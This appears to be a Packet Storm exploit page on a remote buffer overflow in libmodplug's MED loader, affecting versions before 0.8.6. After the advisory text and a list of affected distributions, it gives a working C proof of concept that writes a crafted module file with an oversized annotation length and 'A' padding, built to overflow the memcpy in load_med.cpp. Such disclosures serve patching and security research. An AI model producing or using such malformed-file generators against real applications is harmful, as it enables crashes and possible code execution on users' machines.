The libmodplug library is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. Versions prior to 0.8.6 are affected.
3ee534500a7935fc069c9d41bd90bd1c6d8eca00c07e014a3f4f88254b81c7e4
view source
print?
/*The libmodplug library is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will result in a denial-of-service condition.
This issue affects versions prior to libmodplug 0.8.6. Since the library is used in multiple other projects (such as TTPlayer and gst-plugins-bad), other applications and versions may also be vulnerable.
Vulnerable:
Ubuntu Ubuntu Linux 9.04 sparc
Ubuntu Ubuntu Linux 9.04 powerpc
Ubuntu Ubuntu Linux 9.04 lpia
Ubuntu Ubuntu Linux 9.04 i386
Ubuntu Ubuntu Linux 9.04 amd64
Ubuntu Ubuntu Linux 8.10 sparc
Ubuntu Ubuntu Linux 8.10 powerpc
Ubuntu Ubuntu Linux 8.10 lpia
Ubuntu Ubuntu Linux 8.10 i386
Ubuntu Ubuntu Linux 8.10 amd64
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
TTPlayer TTPlayer 5.2
S.u.S.E. openSUSE 11.1
S.u.S.E. openSUSE 11.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Novell Linux Desktop 9
RedHat Fedora 9 0
RedHat Fedora 10
Pardus Linux 2008 0
MandrakeSoft Linux Mandrake 2009.1 x86_64
MandrakeSoft Linux Mandrake 2009.1
MandrakeSoft Linux Mandrake 2009.0 x86_64
MandrakeSoft Linux Mandrake 2009.0
MandrakeSoft Linux Mandrake 2008.1 x86_64
MandrakeSoft Linux Mandrake 2008.1
MandrakeSoft Linux Mandrake 2008.0 x86_64
MandrakeSoft Linux Mandrake 2008.0
libmodplug libmodplug 0.8.4
libmodplug libmodplug 0.8
GStreamer gst-plugins-bad 0.10.8
Gentoo Linux
Debian Linux 5.0 sparc
Debian Linux 5.0 s/390
Debian Linux 5.0 powerpc
Debian Linux 5.0 mipsel
Debian Linux 5.0 mips
Debian Linux 5.0 m68k
Debian Linux 5.0 ia-64
Debian Linux 5.0 ia-32
Debian Linux 5.0 hppa
Debian Linux 5.0 armel
Debian Linux 5.0 arm
Debian Linux 5.0 amd64
Debian Linux 5.0 alpha
Debian Linux 5.0
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 armel
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0
*/
/*
libmodplug v0.8
load_med.cpp
BOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)
line 670: memcpy(m_lpszSongComments, lpStream+annotxt, annolen);
*/
/*
author: dummy
e-mail: dummyz@126.com
date: 2008/02/25
*/
#include <windows.h>
#include <stdio.h>
#pragma pack(1)
typedef struct tagMEDMODULEHEADER
{
DWORD id; // MMD1-MMD3
DWORD modlen; // Size of file
DWORD song; // Position in file for this song
WORD psecnum;
WORD pseq;
DWORD blockarr; // Position in file for blocks
DWORD mmdflags;
DWORD smplarr; // Position in file for samples
DWORD reserved;
DWORD expdata; // Absolute offset in file for ExpData (0 if not present)
DWORD reserved2;
WORD pstate;
WORD pblock;
WORD pline;
WORD pseqnum;
WORD actplayline;
BYTE counter;
BYTE extra_songs; // # of songs - 1
} MEDMODULEHEADER;
typedef struct tagMMD0SAMPLE
{
WORD rep, replen;
BYTE midich;
BYTE midipreset;
BYTE svol;
signed char strans;
} MMD0SAMPLE;
// MMD0/MMD1 song header
typedef struct tagMMD0SONGHEADER
{
MMD0SAMPLE sample[63];
WORD numblocks; // # of blocks
WORD songlen; // # of entries used in playseq
BYTE playseq[256]; // Play sequence
WORD deftempo; // BPM tempo
signed char playtransp; // Play transpose
BYTE flags; // 0x10: Hex Volumes | 0x20: ST/NT/PT Slides | 0x40: 8 Channels song
BYTE flags2; // [b4-b0]+1: Tempo LPB, 0x20: tempo mode, 0x80: mix_conv=on
BYTE tempo2; // tempo TPL
BYTE trkvol[16]; // track volumes
BYTE mastervol; // master volume
BYTE numsamples; // # of samples (max=63)
} MMD0SONGHEADER;
typedef struct tagMMD0EXP
{
DWORD nextmod; // File offset of next Hdr
DWORD exp_smp; // Pointer to extra instrument data
WORD s_ext_entries; // Number of extra instrument entries
WORD s_ext_entrsz; // Size of extra instrument data
DWORD annotxt;
DWORD annolen;
DWORD iinfo; // Instrument names
WORD i_ext_entries;
WORD i_ext_entrsz;
DWORD jumpmask;
DWORD rgbtable;
BYTE channelsplit[4]; // Only used if 8ch_conv (extra channel for every nonzero entry)
DWORD n_info;
DWORD songname; // Song name
DWORD songnamelen;
DWORD dumps;
DWORD mmdinfo;
DWORD mmdrexx;
DWORD mmdcmd3x;
DWORD trackinfo_ofs; // ptr to song->numtracks ptrs to tag lists
DWORD effectinfo_ofs; // ptr to group ptrs
DWORD tag_end;
} MMD0EXP;
#pragma pack()
// Byte swapping functions from the GNU C Library and libsdl
/* Swap bytes in 16 bit value. */
#ifdef __GNUC__
# define bswap_16(x) \
(__extension__ \
({ unsigned short int __bsx = (x); \
((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8)); }))
#else
static __inline unsigned short int
bswap_16 (unsigned short int __bsx)
{
return ((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8));
}
#endif
/* Swap bytes in 32 bit value. */
#ifdef __GNUC__
# define bswap_32(x) \
(__extension__ \
({ unsigned int __bsx = (x); \
((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) | \
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24)); }))
#else
static __inline unsigned int
bswap_32 (unsigned int __bsx)
{
return ((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) |
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24));
}
#endif
#ifdef WORDS_BIGENDIAN
#define bswapLE16(X) bswap_16(X)
#define bswapLE32(X) bswap_32(X)
#define bswapBE16(X) (X)
#define bswapBE32(X) (X)
#else
#define bswapLE16(X) (X)
#define bswapLE32(X) (X)
#define bswapBE16(X) bswap_16(X)
#define bswapBE32(X) bswap_32(X)
#endif
int main()
{
MEDMODULEHEADER mmh;
MMD0SONGHEADER msh;
MMD0EXP mex;
FILE* file;
long p;
memset(&mmh, 0, sizeof (mmh));
memset(&msh, 0, sizeof (msh));
memset(&mex, 0, sizeof (mex));
p = 0;
mmh.id = 0x30444D4D; // version = '0'
p += sizeof (MEDMODULEHEADER);
mmh.song = bswapBE32(p);
p += sizeof (MMD0SONGHEADER);
mmh.expdata = bswapBE32(p);
p += sizeof (MMD0EXP);
mex.annolen = bswapBE32(-1);
mex.annotxt = bswapBE32(p);
file = fopen("test.s3m", "wb+");
if ( file == NULL )
{
printf("create file failed!\n");
}
else
{
fwrite(&mmh, 1, sizeof (mmh), file);
fwrite(&msh, 1, sizeof (msh), file);
fwrite(&mex, 1, sizeof (mex), file);
while ( ftell(file) < 0x1000 )
{
fwrite("AAAAAAAAAAAAAAAAAAAA", 1, 16, file);
}
fclose(file);
printf("successed!\n");
}
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed